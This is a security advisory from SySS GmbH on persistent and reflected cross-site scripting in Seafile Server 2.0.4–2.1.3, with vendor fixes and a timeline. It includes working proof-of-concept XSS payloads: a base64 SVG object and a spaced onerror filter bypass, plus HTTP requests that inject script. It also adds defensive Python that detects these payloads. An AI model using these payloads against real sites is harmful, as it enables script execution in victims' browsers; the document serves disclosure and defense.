Advisory ID: | SYSS-2013-002 |
Product: | Seafile Server Community Edition |
Vendor: | Seafile Ltd. |
Affected Version(s): | 2.0.4 Linux, 2.1.2 Linux, 2.1.3 Linux |
Tested Version(s): | 2.0.4 Linux, 2.1.2 Linux, 2.1.3 Linux |
Vulnerability Type: | Cross-Site Scripting |
Risk Level: | High |
Solution Status: | Solved |
Vendor Notification: | 2013-12-16 |
Solution Date: | 2014-01-23 |
Public Disclosure: | 2014-01-23 |
CVE Reference: | Not assigned |
Author of Advisory: | Marcel Mangold, SySS GmbH, www.syss.de/advisories/ |
Document Date: | 2014-01-23 |
Document Version: | v1.4 |
The software suffers from persistent and reflected cross-site scripting vulnerabilities.
Persistent cross-site scripting is possible at least at the following places:
(1) In version 2.0.4 the user wiki page allows arbitrary JavaScript code to be entered. An attacker can use this for persistent cross-site scripting.
In version 2.1.2 the script has to be embedded base64-encoded in an object tag to get past the filter.
In version 2.1.3 spaces at the right place break the filter mechanism.
After commit 1d75bc079c15e30f6574272e25f1c7c7e5b87969 the issue has to be considered fixed, although validation is still performed as output filtering on the client side.
(2) An attacker can send internal messages to other users of the application. The subject field of these messages is vulnerable to persistent cross-site scripting. This way an attacker can have code executed in the context of almost any user of the application. (Fixed in v2.1.2)
(3) The application displays .svg vector graphics that have been uploaded via the file upload function. This file type may contain JavaScript code, which is executed in a user's browser when the file is displayed. (Fixed in v2.1.2)
(4) An attacker can send internal messages to other users of the application. The receiver field is vulnerable to reflected cross-site scripting. This is a rather theoretical issue because CSRF tokens are used, so the request cannot simply be triggered on behalf of a victim from a third-party site. (Fixed in v2.1.3)
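The following Python script is an added illustration and is not code from this advisory or from Seafile. It feeds the payload shapes listed above (constructed copies, with the base64 SVG body shortened) through a token blacklist of the kind that issue (1) describes, then through server-side HTML output encoding, and inspects both results with a parser that tokenises attributes the way a browser does. The blacklist patterns, the detector and the helper names are assumptions made for this example; what it shows is why a filter is no substitute for output encoding of plain-text fields such as the message subject and receiver in issues (2) and (4).

```python
import html
import re
from html.parser import HTMLParser

# Payload shapes from this advisory, as constructed copies. The base64 SVG body of
# the object payload is shortened here (it decodes to an empty <svg></svg>).
PAYLOADS = {
    "script_tag": '<script>alert("SySS XSS")</script>',
    "object_data_uri": '<object data=data:image/svg+xml;base64,PHN2Zz48L3N2Zz4= '
                       'type=image/svg+xml></object>',
    "onerror_plain": '<img src=# onerror=alert("SySS_XSS")>',
    "onerror_space": '<img src=# onerror =alert("SySS_XSS")>',
}

# A token blacklist of the kind the bypasses in this advisory defeat. Written for
# this example; it is not Seafile's filter.
BLACKLIST = (r"<script\b", r"\bon\w+=", r"javascript:")


def naive_blacklist_filter(markup):
    """Remove blacklisted tokens. Whatever the regexes do not match survives."""
    for pattern in BLACKLIST:
        markup = re.sub(pattern, "", markup, flags=re.IGNORECASE)
    return markup


class ActiveContentFinder(HTMLParser):
    """Tokenise like a browser does and record what can run script: script/object/
    embed/iframe start tags, on* attributes (HTML allows whitespace around '='),
    and javascript:/data: URIs in attribute values."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "object", "embed", "iframe"):
            self.findings.append(tag)
        for name, value in attrs:
            if name.startswith("on"):
                self.findings.append(f"{tag}@{name}")
            if value and ":" in value:
                scheme = value.lstrip().split(":", 1)[0].lower()
                if scheme in ("javascript", "data"):
                    self.findings.append(f"{tag}@{name}={scheme}:")


def find_active_content(markup):
    """Return the list of script-capable constructs the parser sees in markup."""
    finder = ActiveContentFinder()
    finder.feed(markup)
    finder.close()
    return finder.findings


def escape_for_html(untrusted):
    """Server-side output encoding: the fix for plain-text fields such as the
    message subject and receiver, which never need markup."""
    return html.escape(untrusted, quote=True)


def compare(payload):
    """What survives each defence, as seen by the parser."""
    return {
        "blacklisted": find_active_content(naive_blacklist_filter(payload)),
        "escaped": find_active_content(escape_for_html(payload)),
    }


if __name__ == "__main__":
    for name, payload in PAYLOADS.items():
        print(f"{name:16} {compare(payload)}")
```

Run with python3: the blacklist neutralises the plain script tag and the plain onerror handler, but the spaced handler and the object element survive it unchanged, while nothing survives output encoding. Wiki content that must keep some markup needs an allowlist-based sanitizer on the server rather than a blacklist; the escape shown here is the right tool only for fields that are plain text.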
(1) Enter the following code into the wiki editor of v2.1.2 (the base64 payload is one continuous string; it decodes to an SVG document containing <script type="text/ecmascript">alert("SySS XSS");</script>):
<object data=data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAwIiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlN5U1MgWFNTIik7PC9zY3JpcHQ+PC9zdmc+ type=image/svg+xml></object>
Enter the following code into the wiki editor of v2.1.3 (the space before the equals sign is what gets the event handler past the filter):
<img src=# onerror =alert("SySS_XSS")>
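As an added example (not code from the advisory or from Seafile), the following Python script decodes the data: URI from the v2.1.2 payload above, checks the resulting SVG document for script-bearing constructs, and shows the kind of response headers a server can use for SVG uploads, which is the exposure described in issue (3). The two comparison SVG documents, the header set and the helper names are assumptions made for this example.

```python
import base64
import xml.etree.ElementTree as ET

# The data: URI from the v2.1.2 wiki payload in this advisory, base64 body re-joined.
POC_DATA_URI = (
    "data:image/svg+xml;base64,"
    "PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmci"
    "IHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQi"
    "IGhlaWdodD0iMjAwIiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlN5U1MgWFNTIik7PC9zY3JpcHQ+PC9zdmc+"
)

# Constructed comparison documents (not from the advisory): one harmless, one that
# carries an event handler and a javascript: link instead of a <script> element.
BENIGN_SVG = b'<svg xmlns="http://www.w3.org/2000/svg"><circle r="5"/></svg>'
HANDLER_SVG = (b'<svg xmlns="http://www.w3.org/2000/svg" '
               b'xmlns:xlink="http://www.w3.org/1999/xlink" onload="alert(1)">'
               b'<a xlink:href="javascript:alert(2)"><text>x</text></a></svg>')


def decode_data_uri(uri):
    """Split a base64-encoded data: URI into (media type, decoded bytes)."""
    header, sep, payload = uri.partition(",")
    if not sep or not header.startswith("data:") or not header.endswith(";base64"):
        raise ValueError("only base64-encoded data: URIs are handled here")
    return header[len("data:"):-len(";base64")], base64.b64decode(payload)


def active_content_in_svg(svg_bytes):
    """List the ways an SVG document can execute script: <script> and
    <foreignObject> elements, on* event-handler attributes and javascript: hrefs.
    (In production, parse with defusedxml rather than ElementTree to resist
    entity-expansion attacks in the same upload path.)"""
    root = ET.fromstring(svg_bytes)
    findings = set()
    for elem in root.iter():
        local = elem.tag.rsplit("}", 1)[-1].lower()
        if local in ("script", "foreignobject"):
            findings.add(f"<{local}>")
        for name, value in elem.attrib.items():
            attr = name.rsplit("}", 1)[-1].lower()
            if attr.startswith("on"):
                findings.add(f"{attr} handler")
            elif attr == "href" and value.strip().lower().startswith("javascript:"):
                findings.add("javascript: href")
    return sorted(findings)


def headers_for_svg_upload(filename, svg_bytes):
    """Response headers for serving an uploaded SVG. A file with active content is
    forced to download and denied script execution by CSP instead of being rendered
    inline in the application's origin."""
    headers = {"X-Content-Type-Options": "nosniff"}
    if active_content_in_svg(svg_bytes):
        headers["Content-Type"] = "application/octet-stream"
        headers["Content-Disposition"] = f'attachment; filename="{filename}"'
        headers["Content-Security-Policy"] = "default-src 'none'; sandbox"
    else:
        headers["Content-Type"] = "image/svg+xml"
        headers["Content-Disposition"] = f'inline; filename="{filename}"'
    return headers


if __name__ == "__main__":
    media_type, svg = decode_data_uri(POC_DATA_URI)
    print(media_type, active_content_in_svg(svg))
    print(headers_for_svg_upload("xss.svg", svg)["Content-Disposition"])
    print(active_content_in_svg(HANDLER_SVG), active_content_in_svg(BENIGN_SVG))
```

Run with python3: the advisory's payload is reported as carrying a <script> element, the constructed handler document as carrying an onload handler and a javascript: link, and only the benign document gets an inline image/svg+xml response. Whether a file is shown inline must be decided from its parsed content, not from its extension or declared media type.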
(2)
Request:
+------------------------------------
POST /message/message_send/ HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de
Accept-Encoding: gzip, deflate
Referer: 127.0.0.1/user/1/msgs/
Cookie: csrftoken=vesdFHfKjk2IIu0sy8suwUzMOk066h1x; sessionid=[...]
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 150

csrfmiddlewaretoken=vesdFHfKjk2IIu0sy8suwUzMOk066h1x&mass_msg=<script>alert("SySS XSS")</script>&mass_email=victim%40sample.xy
+------------------------------------
Response:
+------------------------------------
[...]
<div class="txt">
<div class="msg-main">
<div class="msg-hd w100 ovhd">
<a class="author" href="/user/3/msgs/">seafile2</a>
<span class="time">vor 4 Sekunden</span>
</div>
<p class="msg-con"><script>alert("SySS XSS")</script></p>
<span class="say"></span>
</div>
</div>
</li>
[...]
+------------------------------------
(4)
Request:
+------------------------------------
POST /message/message_send/?from=all HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: Mozilla/5.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: de
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-CSRFToken: dAjlY2zLmP1SmdoneDzTBRG6XynhhAVk
X-Requested-With: XMLHttpRequest
Referer: 127.0.0.1/message/list/
Content-Length: 43
Cookie: csrftoken=dAjlY2zLmP1SmdoneDzTBRG6XynhhAVk; sessionid=zrqax[...]
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

mass_msg=asdf&mass_email=<script>alert(1)<%2fscript>
+------------------------------------
Response:
+------------------------------------
HTTP/1.1 400 BAD REQUEST
Server: gunicorn/0.16.1
Date: Tue, 07 Jan 2014 14:47:01 GMT
Connection: close
Vary: Accept-Language, Cookie
Content-Type: application/json; charset=utf-8
Content-Language: de
Content-Length: 130

{"html": "", "error": ["Senden der Nachricht an <script>alert(1)</script> fehlgeschlagen, da der Benutzer nicht gefunden wurde."]}
+------------------------------------
The German error message reads: "Sending the message to <script>alert(1)</script> failed because the user was not found." The receiver value is reflected into the JSON error text without encoding.
(1) Update to version 2.1.4 - vendor fixed the issue
(2) Update to version 2.1.2 - vendor fixed the issue
(3) Update to version 2.1.2 - vendor fixed the issue
(4) Update to version 2.1.3 - vendor fixed the issue
2013-12-02 - Vulnerability discovered
2013-12-16 - Vulnerability reported to developer
2013-12-30 - Patches for issues (2) and (3) committed to GitHub
2014-01-07 - Vulnerability status reported to developer
2014-01-08 - Patches for issues committed to GitHub
2014-01-11 - Received e-mail from the developer that the new version 2.1.3 with the issues fixed has been released
2014-01-13 - Verified issue (4) is fixed
2014-01-13 - Vulnerability status reported to developer
2014-01-14 - Patch for issue (1) committed to GitHub, while validation is still done using output filtering on the client side (commit 1d75bc079c15e30f6574272e25f1c7c7e5b87969)
2014-01-23 - Version 2.1.4 published - this update solves all issues mentioned in this document
[1] SySS GmbH, SYSS-2013-002 - www.syss.de/advisories/SYSS-2013-002 - Persistent Cross-Site Scripting (XSS) in Seafile 2.0.4 Server
[2] SySS GmbH, SySS Responsible Disclosure Policy
Security vulnerability found by Marcel Mangold of SySS GmbH
E-Mail: marcel.mangold@syss.de
Public Key: www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Marcel_Mangold.asc
Key ID: AC15E5BE
Key Fingerprint: E21C 69ED 9A64 7486 6EDD 5E29 4EFE B20B AC15 E5BE
The information provided in this security advisory is provided "as is" and without warranty of any kind.
Details of this security advisory may be updated in order to provide as accurate information as possible.
The latest version of this security advisory is available on the SySS Web site [1].
Creative Commons - Attribution (by) - Version 3.0
Your direct contact to SySS: +49 (0)7071 - 40 78 56-0 or anfrage@syss.de | IN URGENT CASES OUTSIDE BUSINESS HOURS: +49 (0)7071 - 40 78 56-99
Framework contract customers, please dial the on-call number provided to you.